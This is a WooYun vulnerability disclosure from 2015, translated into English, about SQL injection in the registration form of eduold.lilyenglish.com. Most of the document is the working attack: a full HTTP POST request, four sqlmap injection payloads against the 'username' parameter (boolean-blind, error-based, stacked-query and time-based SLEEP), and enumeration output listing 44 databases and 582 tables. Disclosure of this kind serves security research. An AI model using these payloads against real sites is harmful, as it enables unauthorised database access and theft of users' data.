
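Vulnerability summary

Bug ID: wooyun-2015-0154204

Title: SQL injection vulnerability in a LILY English site

Vendor: lilyenglish.com

Author: 路人甲

Submitted: 2015-11-19 18:58

Fix time: 2015-11-25 09:00

Disclosure time: 2015-11-25 09:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 13

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]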


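Vulnerability details

Disclosure status:

2015-11-19: Details sent to the vendor; awaiting vendor handling
2015-11-25: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description: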

POST /zc/opSubmit HTTP/1.1
Content-Length: 748
Content-Type: application/x-www-form-urlencoded
Cookie: OSM=7km7j7o67jef3826t9kp6eao21; CNZZDATA3500643=cnzz_eid%3D1321326244-1447658263-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447658263; __utmt=1; __utma=161720296.317590837.1447658264.1447658264.1447658264.1; __utmb=161720296.1.10.1447658264; __utmc=161720296; __utmz=161720296.1447658264.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: eduold.lilyenglish.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&email=sample%40email.tst&password=g00dPa%24%24w0rD&password2=g00dPa%24%24w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND 4508=4508#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=-4156" OR 1 GROUP BY CONCAT(0x71716a7871,(SELECT (CASE WHEN (6472=6472) THEN 1 ELSE 0 END)),0x7178716b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111";(SELECT * FROM (SELECT(SLEEP(5)))zYin)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: regsubmit1=%e6%b3%a8%e5%86%8c%e7%94%a8%e6%88%b7&agree=0&agree1=0&classes_id=0&cnname=dbswsatu&[email protected]&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&phone=555-666-0606&referer=http://www.lilyenglish.com/authsignup/&region_id=0&regmessage=%e6%a0%a1%e5%86%85%e7%bd%91%e8%b4%a6%e5%8f%b7%e6%b3%a8%e5%86%8c%e5%ae%b6%e9%95%bf%e7%94%b3%e8%af%b7&serial=1&signuptype=0&urlavatar=images/avatars/2.GIF&username=11111" AND (SELECT * FROM (SELECT(SLEEP(5)))wKsD)#
---
back-end DBMS: MySQL 5.0.11
available databases [44]:

current database: 'homework'
Database: homework
[582 tables]

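Proof of vulnerability:

Fix:

Copyright notice: when reposting, please credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-11-25 09:00

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

2015-12-03: Resolved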